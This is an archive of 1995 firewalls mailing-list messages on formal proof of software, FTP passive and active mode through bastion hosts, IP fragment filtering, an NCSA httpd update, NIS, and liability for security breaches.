10:16:23 CDT Date: Tue, 9 May 95 10:16:23 CDT From: amolitor@anubis.network.com (Andrew Molitor) Message-Id: <9505091516.AA12315@anubis.network.com> To: firewalls@greatcircle.com Subject: Formal methods (formerly 'Source Code') Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I'll take a moment here to put forth a mathematician's view on proofs. A proof is, in fact, nothing more than a really convincing argument. You start from some axioms, which may or may not be explicitly stated (you hope you've written down the important ones) and you crank your input through some logical methods which you also have written down and after a while out pops the result. For example, let's take a gander at a classic: All men are mortal. Aristotle is a man. Therefore Aristotle is mortal. Looks good, right? Well, let's see what we're assuming. 'All men are mortal.' and 'Aristotle is a man.' are right up front as hypotheses. We could have a whack at proving them, but that gets us into an infinite regress of proving hypotheses. Eventually, you have to stop and assume something without proof. Less obvious is the logical system underlying. We're also assuming that if a statement 'A' is true, and if a statement 'A implies B' is true that then 'B' must be true. If you like, you can take this as a definition of what it means to be true, but then you have the problem of showing that 'logical trueness' is enough to ensure that Aristotle's actually going to die. For verifying systems, you have the problem of verifying your tools, and then verifying whatever you used to verify them and so an, ad infinitum. Then you have the problem of whether or not the techniques used to formally transform the specifications and the implementations into whatever it is that you then show is isomorphic are actually right. After all, you can just multiply both sides by zero, proclaim 'Look, equality!', and call it done, but that's not really the same thing as showing the wretched thing will work. The point here is that mathematical proof is altogether too often used as a spiffy mechanism for snowing the unwashed masses. When you get right down to it, all you can do is show certain sorts of consistencies, and provide convincing arguments. All 'proof' means is a higher standard of convincingness, and and care taken as to what your underlying assumptions are. If someone tries to sell you a system that's been 'proven correct' all they can possibly have done is review it in great detail, and show that if some (possibly well hidden and obscure) assumptions are true, then the box will work right. Note that this is not a statement of the form 'all they probably did', I said and I meant 'all they can possibly have done.' I've been a mathematician and a software engineer, and from what I can see the mathematical approach is inappropriate for software engineering. Certainly care of thought, careful design with peer review, and other formalisms have a valuable role to play but this should not be confused with mathematics. The experimental sciences have far more to teach us. Andrew From firewalls-owner Tue May 9 09:07:37 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id HAA22543 for firewalls-outgoing; Tue, 9 May 1995 07:46:25 -0700 Received: from ees1a0.engr.ccny.cuny.edu (ees1a0.engr.ccny.cuny.edu [134.74.16.18]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id HAA22538 for ; Tue, 9 May 1995 07:46:21 -0700 Received: by ees1a0.engr.ccny.cuny.edu (4.1/SMI-4.1-940815-1) id AA13466; Tue, 9 May 95 10:46:47 EDT Date: Tue, 9 May 1995 10:46:46 -0400 (EDT) From: Dan Schlitt To: Andrew Molitor Cc: firewalls@greatcircle.com Subject: Re: Source Code In-Reply-To: <9505091324.AA09460@anubis.network.com> Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk So what you are telling us it that the recent "proof" of Fermat's last theorem was just a "convincing argument". It seems to me that the usual method of proof on this mailing list and a lot of other network groups is the famous method of proof by intimidation. When challenged just repeat the argument over again louder. I. for one, would prefer a more rational method of argumentation on this list. If a proposal that we are currently writing is successful I expect to have a lot of questions about firewalling networks in high schools to control access and it would be nice if this list would have a better signal to noise ratio when I need advice. /dan -- Dan Schlitt School of Engineering Computer Systems dan@ee-mail.engr.ccny.cuny.edu City College of New York (212)650-6760 New York, NY 10031 From firewalls-owner Tue May 9 09:11:20 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id HAA22558 for firewalls-outgoing; Tue, 9 May 1995 07:47:00 -0700 Received: from tserver.dsac.dla.mil (tserver.dsac.dla.mil [131.78.6.153]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id HAA22553 for ; Tue, 9 May 1995 07:46:56 -0700 Received: by tserver.dsac.dla.mil (5.65/1.35) id AA08159; Tue, 9 May 95 10:46:38 -0400 From: nto2584@tserver.dsac.dla.mil (Steven Payne) Message-Id: <9505091446.AA08159@tserver.dsac.dla.mil> Subject: Re: kerberized rlogin for bsd/os To: mae@ECUA.NET.ec Date: Tue, 9 May 1995 10:46:37 -0400 (EDT) Cc: firewalls@greatcircle.com In-Reply-To: <32558.mae@gu.pro.ec> from "Mauricio A. Echeverr!a." at May 9, 95 09:02:33 am X-Mailer: ELM [version 2.4 PL21] Content-Type: text Content-Length: 2873 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > > I am due to connect to the internet soon and am looking at firewalls and > other security for PC's as all we have are one sun stuffed full of the most > confidential data and a network of PC's most running NT or Workgroups. I > have one PC to play with for security which I guess I can give over to any > OS I want. Any comments on your solutions and why/how you chose them would > be most welcome. Please put my name in the subject bar if you have time to > reply as until we are connected we are on a shared account (ACK!!!!). Many > thanks, > > Rufus Evison > > Consulta > > Magician and part time security consultant. > Mr Evison, We chose BSDI because the fwtk was/is tested and porting the software would be much easier. The BSDI is very inexpensive, is standard BSD uses sockets and the pain/anguish of getting the toolkit up and running was straightforward. I did run into some global problems with the toolkit and compiling it. But I believe this to be an incompatibility with the "make" program, and one #define (sys_errlist) already in stdio.h other than that it was clean. We really did not have the time to spend on porting to some other platform so time was/is of the essence to get the firewall up and operating. AS A NOTE: (BSD compared to SysV is much more simpler) I say this after having worked exclusively with sysVr3 for almost 5 years. The BSDI kernel was trimmed down from the GENERIC build to just what we needed to install the toolkit and get it running. (We could post the config if needed, but I would like to do that to just people who need it. We are in the testing mode now and are looking to run benchmarks on the platform in use. We will post these as they are available. steve payne DLA Systems Design Center Office of Technology Infusion 614-692-9991 home page www.dsac.dla.mil > > In message Thu, 4 May 1995 20:08:58 -0400 (EDT), > nto2584@tserver.dsac.dla.mil (Steven Payne) writes: > > > hi, > > I am presently installing/testing a firewall based on the tis fwtk > > and running on a 486 under bsd/os. My problem is I do not have the > > kerberized rlogin working properly. We modified the port from 513 to > > 543 and recompiled rlogin-gw. It isn't quite working yet, so I thought > > I would pose the question to the net and see if it's already been done. > > > > We suspect that the negotiation of rlogin (kerberized client to the > > rlogind -k server) may be a cause of the problem. Anyone have any > > ideas, or better yet a completed kerberized rlogin-gw ? > > > > Any help would be appriciated. If we have to write the kerberized > > rlogin-gw sources may be possible to be obtained. Is there any interest > > or any ideas on this subject? > > > > thanks > > steve payne > > DLA Systems Design Center > > Office of Technology Infusion > > 614-692-9991 > > home page > > www.dsac.dla.mil > > > From firewalls-owner Tue May 9 09:47:09 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA24353 for firewalls-outgoing; Tue, 9 May 1995 09:31:27 -0700 Received: from aurora (AURORA.PHYS.UTK.EDU [128.169.207.157]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id JAA24344 for ; Tue, 9 May 1995 09:31:24 -0700 Received: by aurora (Linux Smail3.1.28.1 #4) id m0s8vAP-00007wC; Tue, 9 May 95 12:42 PDT Date: Tue, 9 May 1995 12:42:00 -0700 (PDT) From: Steve Blass To: Andrew Molitor cc: firewalls@greatcircle.com Subject: Re: Formal methods (formerly 'Source Code') In-Reply-To: <9505091516.AA12315@anubis.network.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk There's a big difference between proof and truth which stems from the assumptions taken as axiomatically true a priori. Regarding firewalls it implies that no matter how well the if-then chain of logic proves things are safe the truth is that software has bugs. From firewalls-owner Tue May 9 09:51:53 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA23754 for firewalls-outgoing; Tue, 9 May 1995 09:06:52 -0700 Received: from orpheus.amdahl.com (orpheus.amdahl.com [129.212.11.6]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id JAA23749 for ; Tue, 9 May 1995 09:06:48 -0700 Received: from brittany.oes.amdahl.com by orpheus.amdahl.com with smtp (Smail3.1.29.1 #1) id m0s8roa-0000k2C; Tue, 9 May 95 09:07 PDT Received: by brittany.oes.amdahl.com (5.0/SMI-4.1/DNS) id AA22451; Tue, 9 May 1995 09:07:18 +0800 Date: Tue, 9 May 1995 09:07:18 +0800 From: patrick@oes.amdahl.com (Patrick Horgan) Message-Id: <9505091607.AA22451@brittany.oes.amdahl.com> To: firewalls@GreatCircle.com, cwerner@hsdemo.merit.edu Subject: Re: ftp through 2 dual-homed bastions X-Sun-Charset: US-ASCII content-length: 4189 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > > Outside Inside > ---- -----------Router-------- --------- > dual-homed dual-homed > bastion bastion > A X Y B > > > User on internal net ftps Inside and connects to B. > ftp-gw forwards connection to X. > Responses fromX are handled by ftp-gw back to B. > > no ip-forwarding > You've found the Catch-22 of passive mode. Normally ftp uses a client originated PORT command to tell the daemon what port to connect to for the data channel. When you're behind a firewall, and not allowing in- coming connections, you can instead use the PASV command to ask the server to tell the client what port to connect to for the data channel. The only difference is what direction the first connection goes, once the connection is established, tcp is tcp. Now we come to your situation. When the user inside ftps to B and and it's then proxied out of Y, from your point of view it doesn't matter whether you use PASV or PORT, since they can talk freely to the ftp-gw listening at Y. You're only concern is whether the router in the middle will filter out the connection. This is a valid concern. If you use PASV mode, both ends of the connection, from you and from him are non- priviledged ports, and the numbers just depend on what the last port used on each machine were. If you use the PORT command, it will be an incoming connection to your firewall, the source port will be the ftp data port, port 20, and the destination port will be a high numbered (unpriviledged,) port. In the first case your router has to let this through: HIS END YOUR END X-ipaddr.PASVhighport <-- Y-ipaddr.anyhighport If you use the second with the PORT command, this is the picture: HIS END YOUR END X-ipaddr.20 --> Y-ipaddr.PORThighport The first one is inherently safer, since it's an outgoing connection. The second one is commonly used, but remember, if someone compromises X, then anything could bind port 20. If you disallow logins on Y, this is still fairly safe, because someone would have to somehow get something running on Y to talk to whatever they get running on X. What happens on the other end? If I understand you correctly, you can only connect to X, because there's no forwarding through the firewall on that end. You could get them to run a proxy with the rules set up so that traffic from Y is allowed to connect to A, or you could have the other end establish a drop site on X. That's your only choices if they aren't going to allow connections through. A variation, one used on the site where the bind package lives, among others, is that you can ftp through their firewall to a certain machine, with the filter set up to allow incoming connections to port 21, the ftp control port, and outgoing connections from port 20. If they set it up like this, you cannot use passive mode for your connection, since even though their daemon will respond to your PASV command with a port number, their filter won't allow your incoming connection through. If you can get them to set up the filters for this then PORT's the way to go. Some of the newer clients now try PORT first, and if the connection fails, try PASV. That get's you the best of both worlds. The ftp code in the newest libwww does this. I hope this has been informative. Patrick p.s. I still have clients modified to use PASV mode available at our ftp site, ftp://charon.amdahl.com/pub/patrick _______________________________________________________________________ / These opinions are mine, and not Amdahl's (except by coincidence;). \ | (\ | | Patrick J. Horgan Amdahl Corporation \\ Have | | patrick@amdahl.com 1250 East Arques Avenue \\ _ Sword | | Phone : (408)992-2779 P.O. Box 3470 M/S 316 \\/ Will | | FAX : (408)773-0833 Sunnyvale, CA 94088-3470 _/\\ Travel | \___________________________O16-2294________________________\)__________/ From firewalls-owner Tue May 9 10:09:45 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA24580 for firewalls-outgoing; Tue, 9 May 1995 09:39:51 -0700 Received: from sgf.fv.com (sgf.fv.com [199.171.113.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id JAA24564 for ; Tue, 9 May 1995 09:39:45 -0700 Received: by sgf.fv.com (Smail3.1.28.1 #52) id m0s8sIK-000GrwC; Tue, 9 May 95 12:38 EDT Date: Tue, 9 May 1995 12:38:00 +0100 From: FV Admin mail Subject: Re: Source Code To: Dan Schlitt cc: Andrew Molitor , firewalls@GreatCircle.COM In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Tue, 9 May 1995, Dan Schlitt wrote: > So what you are telling us it that the recent "proof" of Fermat's last > theorem was just a "convincing argument". No, because the proof of Fermat's theorem was about formal things, numbers to be exact. You can prove the area of a circle is a certain number relative to the radius, but you can't prove that the disk you just milled has a certain area. You can prove that a program should always generate the answer "42", but if you run it on a Pentium, you may be in trouble. See the difference? --Darren From firewalls-owner Tue May 9 10:34:36 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA23925 for firewalls-outgoing; Tue, 9 May 1995 09:15:23 -0700 Received: from noc1.mid.net (noc1.mid.net [198.247.250.15]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id JAA23920 for ; Tue, 9 May 1995 09:15:19 -0700 Received: (from alan@localhost) by noc1.mid.net (8.6.10/8.6.9) id LAA23178 for firewalls@greatcircle.com; Tue, 9 May 1995 11:15:48 -0500 From: Alan Hannan Message-Id: <199505091615.LAA23178@noc1.mid.net> Subject: SNMP list consolidated To: firewalls@greatcircle.com Date: Tue, 9 May 1995 11:15:46 -0500 (CDT) X-Mailer: ELM [version 2.4 PL23] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Length: 1390 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Howdy. Well, 'twas it not Tesla and Edison who both "discovered" the transformation of electrical power at the same time? Perhaps not. Regardless, Michael Richardson, Patrick Horgan, and I have agreed to consolidate the firewall SNMP MIB discussion to the list located at "fw-snmp@mid.net". Thank you both for such a quick resolution. Michael, perhaps you'd care to subscribe the people in your list onto the mailing list at midnet by scripting a mass subscribe. Anyone who has mailed me personally asking me to add them to the list, I don't have the time or inclination to do such. If you can't figure out how to add yourself, send a message to majordomo@mid.net with "help" in the body of the letter. (That's without the quotes) I'm on vacation anyway. I'm at the Apple World Wide Developer's Conference in case anynoe else is. It's not that I like Macs, just that Mac users have a lot of money... ;) Thank you everyone for subscribing, I showed 60 subscriptions last night at 8pm central, and many many more since. I look forward to fruitful discussion. -- alan@mid.net, (402) 472-0241 (voice) Networked Systems Administrator (402) 472-0240 (fax) MIDnet, the United States Oldest Regional Internet Service Provider " They that can give up essential liberty to obtain a little temporary safety deserve neither liberty nor safety. " - Benjamin Franklin From firewalls-owner Tue May 9 10:39:24 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA26040 for firewalls-outgoing; Tue, 9 May 1995 10:37:16 -0700 Received: from nahanni.BouletFermat.ab.ca (dboulet.ccinet.ab.ca [198.161.96.245]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id KAA26027 for ; Tue, 9 May 1995 10:37:07 -0700 Received: (from danny@localhost) by nahanni.BouletFermat.ab.ca (8.6.9/8.6.9) id LAA02644 for firewalls-digest@greatcircle.com; Tue, 9 May 1995 11:01:01 -0600 Date: Tue, 9 May 1995 11:01:01 -0600 From: Danny Boulet Message-Id: <199505091701.LAA02644@nahanni.BouletFermat.ab.ca> To: firewalls-digest@greatcircle.com Subject: Re: IP Packet Filtering Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Someone asked what various IP packet filtering packages do with fragmented packets (or something along those lines). My facility (ipfirewall) works as follows: - you can filter based on whether a packet is: = the first fragment of a fragmented packet = a fragment other than the first fragment of a fragmented packet = any fragment of a fragmented packet - filters that check TCP/UDP port numbers or that check if the packet is a TCP connection-attempt packet (has the SYN flag set and the ACK flag clear) are only applied to the first fragment if the packet has been fragmented. Also, the information needed to do the check (the port numbers and the TCP flags if needed) must be in this first fragment or the packet is rejected. I will concede that, in theory, this implementation is broken (i.e. it could reject a packet that shouldn't be rejected). I contend that, in practice, the implementation is correct since packets aren't fragmented into pieces that are so small that the TCP flags appear in the second fragment. If someone sends you fragments that are so short that the TCP flags don't make it into the first fragment then either the sender is trying to do something weird or it is going to take an absurd number of fragments to get any reasonable amount of data through to you. My ipfirewall package is available via ftp from ftp://ftp.nebulus.net/pub/bsdi/security/ipfirewall_v2.0a.gz or ftp://ftp.bsdi.com/contrib/networking/security/ipfirewall_v2.0a.shar.gz Please contact me directly for more information (danny@BouletFermat.ab.ca). -Danny From firewalls-owner Tue May 9 13:23:37 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA29331 for firewalls-outgoing; Tue, 9 May 1995 12:49:10 -0700 Received: from VNET.IBM.COM (vnet.ibm.com [199.171.26.4]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id MAA29325 for ; Tue, 9 May 1995 12:49:02 -0700 Received: from BTV by VNET.IBM.COM (IBM VM SMTP V2R3) with BSMTP id 9006; Tue, 09 May 95 15:49:25 EDT Received: by BTV (XAGENTA 4.0) id 7262; Tue, 9 May 1995 15:49:16 -0400 Received: from kdp.btv.ibm.com by btv.ibm.com (AIX 3.2/UCB 5.64/1.9) id ; Tue, 9 May 1995 15:49:17 -0400 Received: by btv.ibm.com (AIX 3.2/UCB 5.64/fs4.03) id AA36816; Tue, 9 May 1995 15:49:17 -0400 Message-Id: <9505091949.AA36816@btv.ibm.com> To: firewalls@greatcircle.com X-Note-Format: RFC822 Subject: Re: One Time Password Tokens In-Reply-To: <199505091450.AA07097@northshore.ecosoft.com> Date: Tue, 09 May 1995 15:49:17 -0400 From: "Ken Paquette" Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Or does anybody have any information on CRYPTOCard, Inc. 1649 Barclay Blvd. Buuffalo Grove, IL. -- Ken Paquette; IBM Microelectronics Division; Distributed Computing Services VNET: KEN at BTV; IBM internet: ken@btv.ibm.com; Internet: ken@vnet.ibm.com; IBMMAIL: USIB1X62; X.400 c=us; a=ibmx400; p=ibmmail; s=paquette; g=paquetk From firewalls-owner Tue May 9 13:53:00 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA29246 for firewalls-outgoing; Tue, 9 May 1995 12:42:46 -0700 Received: from math.ams.org (MATH.AMS.ORG [130.44.1.5]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id MAA29241 for ; Tue, 9 May 1995 12:42:37 -0700 Received: from sol08.ams.org by MATH.AMS.ORG (PMDF #7286 ) id <01HQAYZHTE5S95NE55@MATH.AMS.ORG>; Tue, 9 May 1995 15:42:47 EST Received: by sol08.ams.org (4.1/SMI-4.1) id AA01467; Tue, 9 May 95 15:42:40 EDT Date: 09 May 1995 15:42:39 -0300 (BST) From: Todd Vander Does Subject: Liable for security To: Firewalls@GreatCircle.COM Message-id: Content-transfer-encoding: 7BIT Sender: firewalls-owner@GreatCircle.COM Precedence: bulk We are analyzing the potential costs of a security breach. One of the questions we are considering is the liability that may be incurred qwith various types of unauthorized behavior. What legal problems could a company incur if: 1. An employee posts offensive material? 2. A cracker hid a trojan horse in materials the company distributes? 3. A cracker distributes copyrighted software from the company's server? There are many different angles, but the basic question is whether or not there is a real risk of being held liable for damage done by elicit changes to the company's computer system. Does anyone know of relevant cases? Can anyone refer me to useful reference material? From firewalls-owner Tue May 9 14:04:21 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA29641 for firewalls-outgoing; Tue, 9 May 1995 13:04:42 -0700 Received: from iss.net (iss.iss.NET [204.241.60.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id NAA29636 for ; Tue, 9 May 1995 13:04:38 -0700 Received: (from cklaus@localhost) by iss.net (8.6.4/8.6.4) id QAA21275 for firewalls@greatcircle.com; Tue, 9 May 1995 16:20:17 -0700 From: Christopher Klaus Message-Id: <199505092320.QAA21275@iss.net> Subject: NCSA 1.4 Released To: firewalls@greatcircle.com Date: Tue, 9 May 1995 16:20:16 +1494730 (PDT) X-Mailer: ELM [version 2.4 PL20] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Length: 799 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk NCSA version 1.4 was released last week and might be a good idea to install if you are running NCSA 1.3 or below. NCSA 1.3 had several vulnerability bugs that allow intruders to gain remote access. Since some firewalls allowed http through to a web server, it would be a very good idea to insure you aren't vulnerable. It is available at ftp.ncsa.uiuc.edu. Some recommendations when setting up a httpd server is make sure it is running as nobody in the configuration files and if possible, run it in a chroot environment. Cheers, Christopher -- Christopher William Klaus Voice: (404)441-2531. Fax: (404)441-2431 Internet Security Systems, Inc. Computer Security Consulting 2000 Miller Court West, Norcross, GA 30071 ========================< http://iss.net/~iss >========================= From firewalls-owner Tue May 9 14:39:59 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA29566 for firewalls-outgoing; Tue, 9 May 1995 13:01:28 -0700 Received: from i17linuxb.ists.pwr.wroc.pl (i17linuxb.ists.pwr.wroc.pl [156.17.35.8]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id NAA29561 for ; Tue, 9 May 1995 13:01:22 -0700 Received: (from marekm@localhost) by i17linuxb.ists.pwr.wroc.pl (8.6.12/8.6.9) id WAA18835; Tue, 9 May 1995 22:00:46 +0200 From: Marek Michalkiewicz Message-Id: <199505092000.WAA18835@i17linuxb.ists.pwr.wroc.pl> Subject: Re: Linux as multi-homed firewall... (fwd) To: avalon@coombs.anu.edu.au (Darren Reed) Date: Tue, 9 May 1995 22:00:46 +0200 (MET DST) Cc: firewalls@greatcircle.com In-Reply-To: <199505030854.BAA18625@miles.greatcircle.com> from "Darren Reed" at May 3, 95 06:56:28 pm X-Mailer: ELM [version 2.4 PL23] Content-Type: text Content-Length: 945 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > I posted this mail elsewhere, and I'm doing it again here for user > education. Sorry to those who see it twice. Maybe I should/could post > it to bugtraq (even instead of), but the point I'm trying to make is > one centred on bugs, but on choice of software for firewalls and the > quality thereof. Someone who uses linux might want to file a bug > report if they think it's serious enough. This bug is fixed now, see ftp://ftp.linux.org.uk/pub/tmp/ipsizefix-1.2.8 for a patch. No OS is completely bug free, and we all know that. It is easy to just complain that "Linux is buggy" but, unfortunately, this doesn't make it any less buggy... Instead, please report bugs in Linux to the appropriate mailing lists: linux-net@vger.rutgers.edu linux-kernel@vger.rutgers.edu [opinions about Linux and Linux users deleted] [Linux and *BSD IP source code fragments deleted] Regards, -- Marek Michalkiewicz From firewalls-owner Tue May 9 14:51:13 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA00518 for firewalls-outgoing; Tue, 9 May 1995 13:48:44 -0700 Received: from ecua.net.ec (ecua.net.ec [157.100.1.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id NAA00507 for ; Tue, 9 May 1995 13:48:37 -0700 Received: by ecua.net.ec (AIX 3.2/UCB 5.64/4.04) id AA05932; Tue, 9 May 1995 15:43:24 -0500 X-Nupop-Charset: English Date: Tue, 9 May 1995 15:37:36 -0500 (EST) From: "Mauricio A. Echeverr!a." Reply-To: mae@gu.pro.ec Message-Id: <56261.mae@gu.pro.ec> To: firewalls@GreatCircle.com Subject: Fw: RE: Thought this was something you were doing, came through the mail...Fw: distributed passwd program Sender: firewalls-owner@GreatCircle.COM Precedence: bulk ------------------------------ From: Nigel M Evans Tue, 09 May 1995 15:40:34 GMT To: mae@gu.pro.ec Subject: RE: Thought this was something you were doing, came through the mail...Fw: distributed passwd program Rufus, How are you old bean - I was mystified to receive mail from gu.pro.ec - where on earth is that? Distributed password is achieved using NIS (formerly called Yellow Pages or yp). Good news is its free because it is incorporated in all UNIX o/s, bad news is its not very secure, but I think its OK on a LAN providing that LAN is adequately secured from the Internet (firewall ...) You need to choose a yp server, suggest find out how easy it is on the various flavours of UNIX you've got by reading docn/man pages (man -k yp) or calling suppliers. On AIX its menu driven from smit, on others you need lots of commands. Also pick a machine that won't be rebooted or shutdown more often than can be helped. Then put definitive list of users/passwds/uid/gid onto server machine. Then introduce clients one by one - may need to do a lot of chown/chgrp of files if gids/uids weren't consistent before. Method varies with o/s, AIX smit, some are ypinit, some need reboot ... Let me know if you have any more specific requests, also let me have a few lines of news for MAIL$ALL! Nigel From firewalls-owner Tue May 9 15:00:11 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id OAA01161 for firewalls-outgoing; Tue, 9 May 1995 14:19:11 -0700 Received: from [198.102.244.36] (quadra.greatcircle.com [198.102.244.36]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id OAA01156; Tue, 9 May 1995 14:19:07 -0700 X-Sender: brent@miles.greatcircle.com Message-Id: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Tue, 9 May 1995 14:19:54 -0800 To: Christopher Klaus , firewalls@greatcircle.com From: Brent@GreatCircle.COM (Brent Chapman) Subject: Re: NCSA 1.4 Released Sender: firewalls-owner@GreatCircle.COM Precedence: bulk At 12:36 PM 8/10/93, Christopher Klaus wrote: >NCSA version 1.4 was released last week and might be a good idea to >install if you are running NCSA 1.3 or below. NCSA 1.3 had several >vulnerability bugs that allow intruders to gain remote access. >Since some firewalls allowed http through to a web server, it would be >a very good idea to insure you aren't vulnerable. > >It is available at ftp.ncsa.uiuc.edu. > >Some recommendations when setting up a httpd server is make sure it is >running as nobody in the configuration files and if possible, run it >in a chroot environment. NCSA _what_? HTTP server? Mosaic? Telnet for Mac or Windows? NCSA (the National Center for Supercomputer Applications) produces _lots_ of different software packages. -Brent ---------------------------------------------------------------------- For info about the Internet Security Firewalls Tutorial and a schedule of upcoming dates, please send email to Tutorial-Info@GreatCircle.COM ---------------------------------------------------------------------- Brent Chapman Great Circle Associates Brent@GreatCircle.COM 1057 West Dana Street +1 415 962 0841 Mountain View, CA 94041 From firewalls-owner Tue May 9 15:25:55 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA29779 for firewalls-outgoing; Tue, 9 May 1995 13:09:50 -0700 Received: from SHRMED.COM (shrmed.com [199.29.63.4]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id NAA29772 for ; Tue, 9 May 1995 13:09:46 -0700 Received: from SYS068 by SHRMED.COM (PMDF V4.2-12 #4739) id <01HQAZVXH06O000BDO@SHRMED.COM>; Tue, 9 May 1995 16:08:59 EDT Received: from MR.SHRMED.COM by OASYS.SHRMED.COM (PMDF V4.2-12 #4739) id <01HQAZTH6YGG8WW06X@OASYS.SHRMED.COM>; Tue, 9 May 1995 16:07:07 EASTERN Received: with PMDF-MR; Tue, 9 May 1995 16:05:22 EASTERN Alternate-recipient: prohibited Disclose-recipients: prohibited Date: Mon, 8 May 1995 12:31:00 EASTERN From: Kevin DiMichele Subject: Private internet security To: firewalls%GreatCircle.com%INTERNET@MR.SHRMED.COM Message-id: <01HQAZTO03OW8WW06X@MR.SHRMED.COM> MIME-version: 1.0 Content-type: TEXT/PLAIN; CHARSET=US-ASCII Content-transfer-encoding: 7BIT Posting-date: Tue, 9 May 1995 10:49:00 EASTERN Importance: normal Priority: normal X400-MTS-identifier: [;22506190505991/685849@SYS099] A1-type: MAIL Hop-count: 0 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Please review the following scenario: ------------- ----- ------------ | Corporate | <--> | ? | <---> | Customer | | Network | ----- | Network | ------------- >------------< | / \ ---- ---------- / \ ---------- | FW | | Customer |< >| Customer | ---- ---------- ---------- | ---------- | Internet | ---------- The protocol from the Corporate Network to the Customer Network is TCP/IP only. The Corporate Network utilizes an unregistered address, as per RFC 1597. We have installed the Janus Firewall for our Internet connection. Support reps need to get to the Customer premise networks via the Customer Network. The Customer Network exists today as a large SNA private network (mainframe resources shared by approx. 700 customer sites). As we move towards client/server our data center will house applications running on unix boxes, VMS boxes, NetWare boxes, and NT boxes, in addition to the mainframes. These new hosts will act in both: single host/multiple customers and single host/single customer configurations. The transport from a Customer to the Customer Network will be SNA and TCP/IP. Questions: 1. Since we build/manage the Customer Network, is the filtering in the routers between a Customer and the Customer Network sufficient for security (eg. Can customer A be secure from Customer B,and vice-versa)? Or, are firewalls necessary in addition to the routers? 2. Depending to the above answer, do we need one firewall or many (ie. one between the Customer Network and Customers or one between each Customer and the Customer Network)? 3. Again, depending on the answer to (1), are COTS firewalls easily capable of providing proxy services for applications such as SQL, or is the TIS FWTK the right choice? 2. We are planning on implementing a NAT in the box marked with the question mark because we utilize an unregistered address on the Corporate Network, as per RFC1597, and registered addresses on the Customer Network. Depending on the answers to question (1), do we need to install a Firewall (ie. not just a NAT) between a Customer and the Customer Network? Any input would be greatly appreciated. Kevin Please respond via E-Mail: Kevin.DiMichele@shrmed.com From firewalls-owner Tue May 9 15:26:07 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id OAA01310 for firewalls-outgoing; Tue, 9 May 1995 14:26:09 -0700 Received: from iss.net (iss.iss.NET [204.241.60.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id OAA01300; Tue, 9 May 1995 14:26:02 -0700 Received: (from cklaus@localhost) by iss.net (8.6.4/8.6.4) id RAA21797; Tue, 9 May 1995 17:41:44 -0700 From: Christopher Klaus Message-Id: <199505100041.RAA21797@iss.net> Subject: Re: NCSA 1.4 Released To: Brent@GreatCircle.COM (Brent Chapman) Date: Tue, 9 May 1995 17:41:43 +1494730 (PDT) Cc: cklaus@iss.net, firewalls@GreatCircle.COM In-Reply-To: from "Brent Chapman" at May 9, 95 02:19:54 pm X-Mailer: ELM [version 2.4 PL20] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Length: 1249 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > > At 12:36 PM 8/10/93, Christopher Klaus wrote: > >NCSA version 1.4 was released last week and might be a good idea to > >install if you are running NCSA 1.3 or below. NCSA 1.3 had several > >vulnerability bugs that allow intruders to gain remote access. > >Since some firewalls allowed http through to a web server, it would be > >a very good idea to insure you aren't vulnerable. > > > 